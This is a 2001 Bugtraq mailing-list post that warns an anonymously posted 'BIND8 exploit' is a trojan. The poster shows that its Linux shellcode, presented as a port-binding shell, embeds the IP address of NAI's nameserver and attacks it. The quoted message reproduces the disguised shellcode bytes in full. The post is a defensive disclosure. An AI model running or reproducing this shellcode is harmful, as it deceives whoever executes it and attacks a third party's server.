Bugtraq mailing list archives
That BIND8 "exploit" attacks NAI
From: Max Vision <vision () WHITEHATS COM>
Date: Wed, 31 Jan 2001 20:57:54 -0800
Hi, Please beware of running code such as this. It will do it's best to attack NAI's nameserver. It's a typical, though well disguised, shellcode trick. Look in the Linux shellcode: \xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com More details after I have a better look... Max At 04:12 PM 1/31/2001 -0700, you wrote:
>From Anonymous <nobody () replay com> Wed Jan 31 18:06:24 2001 Date: Thu, 31 Jan 2001 18:06:19 -0400 From: Anonymous <nobody () replay com> To: BUGTRAQ () SECURITYFOCUS COM Subject: Bind8 exploit Message-ID: <C5119AD12E92D311928E009027DE4CCA554903 () replay com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Internet Mail Service (5.5.2650.21) /* * Implements TSIG buffer mismanagement overflow for incorrect signatures. That * one was really nice bug! * Thanks NAI for nice bug! */ /* zeroes in all shellcodes are allowed - we encode them anyway.. */ char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to * bind to tcp port 31338. hey aleph1 * :) */ "\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd" "\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d" "\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d" "\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02" "\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff" "\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02" "\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
Current thread:
- [no subject] nobody (Jan 31)
- That BIND8 "exploit" attacks NAI Max Vision (Feb 01)